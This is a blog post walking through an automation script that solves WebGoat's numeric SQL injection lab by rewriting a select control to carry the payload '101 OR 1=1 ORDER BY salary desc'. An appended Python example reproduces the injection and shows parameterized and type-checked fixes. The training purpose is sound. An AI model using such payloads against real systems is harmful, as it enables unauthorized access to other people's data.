OWASP O2 Platform Blog

Solving WebGoat Sql Injection lesson (3rd one)

I had a request from an O2 user today (Thiago) who was trying to write an O2 script to solve the 3rd WebGoat lesson on SQL Injection.

Here is what I did to debug and solve the problem:

– started the O2 Script ‘WebGoat BlackBox exploits’ (you can access it via the ‘OWASP Projects and Website (Custom O2)’ script (Button on the ‘Custom O2s’ Tab))
– clicked on ‘Download latest version’
– saved the file to C:\O2\DemoData (after going to IE to add http://code.google.com/p/webgoat/ to the trusted zone so that IE would allow the download)
– unzipped it (with 7z) and renamed the created directory to WebGoat, so that the full local path to it is C:\O2\DemoData\WebGoat\WebGoat-5.3_RC1 (this matches the path in the O2 Script)
– back in the O2 Script (‘WebGoat Blackbox exploits’), I clicked on the 2nd button ‘Start Local Copy’
– clicked on ‘Open Main page’ (3rd button), which worked ok
– clicked on ‘Exploit Stage 1 Stored XSS OK’ to confirm that all is ok (in this version you need to hover over the XSS link to see the Javascript Alert box)
– now I opened up the O2 Script ‘IE Automation’ and confirmed that I could access WebGoat from there using this script:

panel.clear();
var ie = panel.add_IE().silent(true);
ie.open("http://localhost:8080/webgoat/attack");

//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll

– the next step is to debug the code sample provided by Thiago:

panel.clear();
var ie = panel.add_IE().silent(true);
ie.open("http://172.16.234.138");
ie.link("OWASP WebGoat version 5.3.x").click();
ie.link("Injection Flaws").click();
ie.link("LAB: SQL Injection").click();
ie.link("Stage 3: Numeric SQL Injection").click();

/*Login with larry user*/
ie.field("password").value("larry");
ie.button("Login").flash().click();

ie.selectLists()[1].options()[0].select().flash();
var payload = "101 OR 1=1 ORDER BY salary desc";

/*Change the id*/
/* I couldn't do this */

ie.button("ViewProfile").click();

return 0;

– and here is the code that works:

panel.clear();
var ie = panel.add_IE().silent(true);
//ie.open("http://172.16.234.138");
var webGoatUrl = "http://localhost.:8080/webgoat/attack"; //DC: in my local environment this is where WebGoat is running from
ie.openWithBasicAuthentication(webGoatUrl,"guest","guest"); // DC: you will need to do this once (if using the localhost. address (note the extra dot), which makes it compatible with web proxies like Fiddler)
ie.open(webGoatUrl);
//ie.link("OWASP WebGoat version 5.3.x").click(); // DC: this link doesn't exist in the http://localhost:8080/webgoat/attack page

ie.disableFlashing(); // DC: use this while developing the script since it will disable the flash() function (which takes up a couple of precious seconds)
ie.link("Injection Flaws").click();

ie.link("LAB: SQL Injection").click();
ie.link("Stage 3: Numeric SQL Injection").click();

/*Login with larry user*/
ie.field("password").value("larry");
ie.button("Login").flash().click();
ie.selectLists()[1].options()[0].select();

//var payload = "AAAA";//DC: use this value to test that it is working
var payload = "'101 OR 1=1 ORDER BY salary desc'"; //DC: payload (note the ' padding, required since the original HTML attribute didn't have it)

var originalValue =  ie.selectLists()[1].outerHtml();       //DC: get the Html contents of the Select element
"Before payload the value of the select control is: {0}".debug(originalValue);  //DC: show it in LogViewer
var valueWithPayload  = originalValue.replace("101",payload);     //DC: create the payload to insert (using a rough search and replace)
ie.selectLists()[1].outerHtml(valueWithPayload);         //DC: inject the payload into the page
var updatedValue = ie.selectLists()[1].outerHtml();        //DC: get the new value
"After payload the value of the select control is: {0}".debug(updatedValue); //DC: and show it in the Log Viewer (just for debugging purposes)

ie.button("ViewProfile").click();            //DC: click on the View Profile button

return ie.html().contains("You have completed Stage 3: Numeric SQL Injection.");//DC: quick check to make sure it worked (try modifying the payload to see how this will return false)

//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll
//O2Ref:Microsoft.mshtml.dll
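The script above only has to rewrite the option value of the select control because the lesson's server-side code trusts that value and pastes it straight into the SQL text. The following Python example is added here to show that server-side pattern and its fix; it is not part of the original post nor of WebGoat's code. It uses an in-memory SQLite table with a constructed employee schema and rows (assumptions standing in for WebGoat's data), runs the payload from the script against a concatenating query, and then against a parameterized query and a query that additionally enforces the numeric type the form promised.

```python
import sqlite3

# Constructed sample rows standing in for WebGoat's employee table (not its real schema/data).
EMPLOYEES = [
    (101, "Larry", "Stooge", 55000),
    (102, "Moe", "Stooge", 60000),
    (103, "Curly", "Stooge", 75000),
    (104, "Neville", "Bartholomew", 450000),
]

# The payload used by the O2 script above (without the quote padding the HTML attribute needed).
PAYLOAD = "101 OR 1=1 ORDER BY salary desc"


def make_db():
    """Build the in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE employee (userid INTEGER PRIMARY KEY, "
        "first_name TEXT, last_name TEXT, salary INTEGER)"
    )
    conn.executemany("INSERT INTO employee VALUES (?, ?, ?, ?)", EMPLOYEES)
    return conn


def view_profile_vulnerable(conn, employee_id):
    """The pattern the lesson exercises: the id from the select control is
    concatenated into the SQL, so whatever the client submits becomes SQL."""
    sql = ("SELECT userid, first_name, last_name, salary FROM employee "
           "WHERE userid = " + employee_id)
    return conn.execute(sql).fetchall()


def view_profile_parameterized(conn, employee_id):
    """Defence 1: bind the value as a parameter. The SQL text never changes,
    so the payload is compared as a literal and matches nothing."""
    sql = ("SELECT userid, first_name, last_name, salary FROM employee "
           "WHERE userid = ?")
    return conn.execute(sql, (employee_id,)).fetchall()


def view_profile_fixed(conn, employee_id):
    """Defence 2 on top of 1: reject input that is not the numeric id the
    form promised, so tampering with the select control is detected early."""
    if not employee_id.isdigit():
        raise ValueError("employee id must be numeric: %r" % employee_id)
    return view_profile_parameterized(conn, str(int(employee_id)))


if __name__ == "__main__":
    db = make_db()
    print("normal request:", view_profile_vulnerable(db, "101"))
    # Concatenation: every row comes back, highest salary first.
    print("vulnerable + payload:", view_profile_vulnerable(db, PAYLOAD))
    # Parameter binding: the payload is just a string that matches no userid.
    print("parameterized + payload:", view_profile_parameterized(db, PAYLOAD))
    try:
        view_profile_fixed(db, PAYLOAD)
    except ValueError as err:
        print("type check rejected it:", err)
```

Running it on the normal value returns Larry's single row from all three functions; with the payload, the concatenating version returns all four rows ordered by salary, the parameterized version returns nothing, and the type-checked version refuses the request before touching the database, which is also the point at which a server should log the tampered value.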

December 3, 2010 - Posted by | IE Automation, WatiN
